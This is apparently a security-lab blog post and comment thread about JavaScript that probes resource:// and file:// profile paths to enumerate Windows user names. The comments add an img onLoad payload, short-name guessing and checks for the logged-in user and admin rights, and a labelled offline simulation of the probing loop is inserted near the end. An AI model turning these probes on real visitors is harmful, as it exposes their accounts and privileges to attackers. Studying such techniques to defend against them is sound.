web application security lab

Enumerate Windows Users In JS

Sergey Vzloman is at it again. He sent over a really interesting piece of demo code (he tested it in IE 6.0 and Firefox; I was only able to test it in Firefox) that enumerates users on Windows systems. Each guess points the browser at a file inside a candidate profile directory (resource:// in Firefox, file:// in IE, as Sergey explains in the comments) and watches whether the request loads or errors out. Right now, as the code stands in his demo (with only minor tweaks from me), it only tries four accounts and is intentionally noisy to show what it's doing, but it works pretty well. Click here to see the demo.

Dan Veditz has already commented on this, saying the resource:// issue is already fixed in Firefox 2.0.0.4 and 1.5.0.12. For now, and for earlier versions, this will continue to work. It may be a little slow, since every account name costs one probe, but if you know the user's name is one of a few hundred candidates you can run through them quickly.

Of course there are other ways to do this, like getting the victim to connect to you through a file:///\\ UNC URL, as discussed before, but it's good to have all of this documented since one or more of these may stop working. Nice work, Sergey!

14 Responses to “Enumerate Windows Users In JS”

  1. blah Says:

    This does not work for me in Firefox 2.0.0.3 or current IE6.

  2. RSnake Says:

    Weird, it works for me in 2.0.0.3. What OS are you using for Firefox? Did you make sure to have JS turned on?

  3. Ronald van den Heetkamp Says:

    I like the idea, pity it is very slow.

    But isn't this the same as enumerating with a small image over this:
    [code]
    file:///C:/DOCUME~1/RSnake/My Documents/My Pictures/Sample Pictures/Sunset.jpg" onLoad="alert('Yes! RSnake is alive…');"
    [/code]
    %3Cimg+src%3D%22file:///C:/DOCUME~1/RSnake/My+Documents/My+Pictures/Sample+Pictures/Sunset.jpg%22+onLoad%3D%22alert('Yes!+RSnake+is+alive…')%3B%22%3E

  4. Mephisto Says:

    Didn’t work for me in IE6 on a Win2k machine, but worked fine in Firefox 2.0.0.3 on same machine.

  5. Sergey Vzloman Says:

    re: R/ van den H/

    Yes, you can use images like file:///C:/…/Sample Pictures/Sunset.jpg
    and handle the on(load/error) events to find out the user profile. But I use Russian Windows, where this image is placed at C:\Docume~1\(..USER..)\Документы\Мои рисунки\Образцы рисунков\Закат.jpg (the Russian localization of Documents\My Pictures\Sample Pictures\Sunset.jpg) :) while "ntuser.ini" is located directly in C:\Docume~1\(..USER..)\

    re: Mephisto Says

    Probably you have a debugger or error-handling software installed on IE. If this code is bugged and you are able to find any positive fixes, please post them to me. After some tests I found that this source can be patched to work in IE7 and Opera (add timeout handlers for some cases).

    By the way, if your account is not administrative on the local machine/network domain, there is no chance to read a foreign ntuser.ini (owned by another profile). A restricted user has no access to others' profiles…
    In the present state this code may not work…. Just testing… Only tricks :)

    I think, to brute-force loooong account names (like "ANY ACCOUNT 317"), at first you can find the short name (ANYACC~1). The first 6 letters are known. Brute-force the others… N :)
    The accounts "Administrator" and "Administrator_From_Hell" differ by one byte: "Admini~1" and "Admini~2". If "Admini~1" exists, why not try "Admini~2"?…

  7. Sergey Vzloman Says:

    On my Firefox, remote access to file:///c:/… through an image tag is disallowed. Therefore I used resource: in Firefox and the file: protocol in IE.

  8. Ronald van den Heetkamp Says:

    @Sergey Vzloman Nice… very clever idea.

    Well, I'm not so interested in brute-forcing users; I rather thought about making a list of possible names of people I know. But the most interesting thing, I guess, is to detect whether the user is logged in as Administrator. :)

  9. Kishor Says:

    Look at my comment on this page,
    http://www.gnucitizen.org/projects/pdf-strikes-back/

    I think this will tell you the correct user name (and that it has been fixed).

  10. Wladimir Palant Says:

    RSnake, web pages cannot load file:/// URLs in Firefox; I think this changed around Firefox 1.0 already. So anything involving file:/// URLs will not work there.

  11. Alex Says:

    This is the reason why I’ve always disabled JavaScript in Adobe.

  12. Sergey Vzloman Says:

    @Ronald van den Heetkamp

    I can help you :)

    1. If you detected a user with the name "ANY" through ntuser.ini, try accessing ntuser.dat. If the file is loaded, the user is not currently logged in; if you have no access to the file, it is open and the logged-in user name is "ANY".

    2. If you have access to "c:/Doc…/ANY/ntuser.ini", try "\\127.0.0.1\c$\doc..\ANY\ntuser.ini"; if the file opens, you are an administrator on the local system (domain).

    Let's collect user names! I need them too :)

  13. Sergey Vzloman Says:

    You can try file:///\\127.0.0.1\c$\boot.ini. In this case the user name is unknown, but administrator privileges can be detected…
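
The probing loop the post describes, together with the short-name trick from comment 5 and the logged-in and administrator checks from comments 12 and 13, as one added JavaScript example. This is not Sergey's demo code and not the post's own: the probe interface, the in-memory picture of what a session can read, the candidate names, the "~N" short-name rule and the two session models are constructed assumptions so that the logic runs offline under Node. It also generalizes the walk from Admini~1/Admini~2 to any six-letter prefix, and it includes the restricted-user case from comment 5, where only the viewer's own profile answers.

```javascript
"use strict";

// Added example, not the demo code from the post. It runs the enumeration
// logic against a constructed, in-memory picture of what one browser session
// on a Windows 2000/XP-era machine can read, so the loop can run offline.
// In a real browser the probe is asynchronous: point an element at the
// candidate URL (resource:// in the Firefox versions named in the post,
// file:// in IE) and decide on its load or error event, with a timeout for
// the cases Sergey mentions. That browser-side probe is not shown here.

const PROFILES = "C:/Docume~1"; // "Documents and Settings" in 8.3 form
const ADMIN_SHARE_FILE = "//127.0.0.1/c$/boot.ini"; // comment 13's admin check

// Constructed sample 1: the viewer is "RSnake", logged in and a local admin,
// so other profiles are readable and the c$ share answers.
const ADMIN_SESSION = buildFs({
  readable: [
    `${PROFILES}/RSnake/ntuser.ini`,
    `${PROFILES}/Admini~1/ntuser.ini`, `${PROFILES}/Admini~1/ntuser.dat`,
    `${PROFILES}/Admini~2/ntuser.ini`, `${PROFILES}/Admini~2/ntuser.dat`,
    `${PROFILES}/ANYACC~1/ntuser.ini`, `${PROFILES}/ANYACC~1/ntuser.dat`,
    ADMIN_SHARE_FILE,
  ],
  // The registry hive stays open while its user is logged in.
  locked: [`${PROFILES}/RSnake/ntuser.dat`],
});

// Constructed sample 2: the same machine seen by a restricted user "bob".
// Other profiles are denied (comment 5) and the admin share refuses.
const RESTRICTED_SESSION = buildFs({
  readable: [`${PROFILES}/bob/ntuser.ini`],
  locked: [`${PROFILES}/bob/ntuser.dat`],
});

// Paths are lower-cased because the Windows file system is case-insensitive.
function buildFs({ readable, locked }) {
  const lc = (p) => p.toLowerCase();
  return { readable: new Set(readable.map(lc)), locked: new Set(locked.map(lc)) };
}

// Simulated probe: true when the page would see a load event for the path.
// Missing, denied and locked files all look the same to the page (error or
// timeout), which is the only signal the technique has.
function makeProbe(fsModel) {
  return (path) => fsModel.readable.has(path.toLowerCase());
}

// Directory names to try for one candidate account. Comment 5's trick: a
// long name is reachable through its 8.3 short form, so only the first six
// characters need to be right and the "~N" tail is walked. Assumption: a
// name of eight characters or fewer with no spaces is stored as-is; anything
// longer is probed as PREFIX~1, PREFIX~2, ... up to maxTail.
function dirCandidates(name, maxTail = 4) {
  const compact = name.replace(/[\s.]/g, "");
  if (compact === name && compact.length <= 8) return [name];
  const prefix = compact.slice(0, 6).toUpperCase();
  return Array.from({ length: maxTail }, (_, i) => `${prefix}~${i + 1}`);
}

// Serial probe loop, as in the post: one request per candidate directory,
// which is why it is slow and why the candidate list should be short.
function enumerateProfiles(names, probe, maxTail = 4) {
  const found = new Map(); // directory -> { candidate, loggedIn }
  for (const name of names) {
    for (const dir of dirCandidates(name, maxTail)) {
      if (found.has(dir)) continue;                       // hit earlier via another name
      if (!probe(`${PROFILES}/${dir}/ntuser.ini`)) break; // first miss ends the ~N walk
      // Comment 12: ntuser.dat is the user's registry hive and is held open
      // for the whole session, so a readable ntuser.ini beside an unreadable
      // ntuser.dat marks the logged-in user.
      const loggedIn = !probe(`${PROFILES}/${dir}/ntuser.dat`);
      // A short-name hit proves only that a profile with this prefix exists,
      // not that it belongs to this exact candidate.
      found.set(dir, { candidate: name, loggedIn });
    }
  }
  return found;
}

// Comment 13: reading boot.ini through the administrative share says
// nothing about the user name but does tell you the session is admin.
function isLocalAdmin(probe) {
  return probe(ADMIN_SHARE_FILE);
}

function report(names, fsModel) {
  const probe = makeProbe(fsModel);
  const profiles = enumerateProfiles(names, probe);
  return {
    profiles: Object.fromEntries(profiles),
    loggedIn: [...profiles].filter(([, v]) => v.loggedIn).map(([dir]) => dir),
    admin: isLocalAdmin(probe),
  };
}

const CANDIDATES = ["Administrator", "Administrator_From_Hell", "RSnake", "bob", "ANY ACCOUNT 317"];
console.log("admin session:", JSON.stringify(report(CANDIDATES, ADMIN_SESSION)));
console.log("restricted session:", JSON.stringify(report(CANDIDATES, RESTRICTED_SESSION)));
```

Against the first model the walk stops at ADMINI~3, finds ANYACC~1 from the prefix alone, flags RSnake as the logged-in user and reports admin; against the restricted model only the viewer's own profile answers and the admin share fails, which is the limitation Sergey points out in comment 5.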

  14. Reiners Says:

    Hi!
    Just wanted to add that my old IE keeps crashing after I confirm the JavaScript popup.

    OS: WinXP, SP2, latest hotfixes
    IE: 6.0.2900.2180 SP2

    I thought that could be interesting …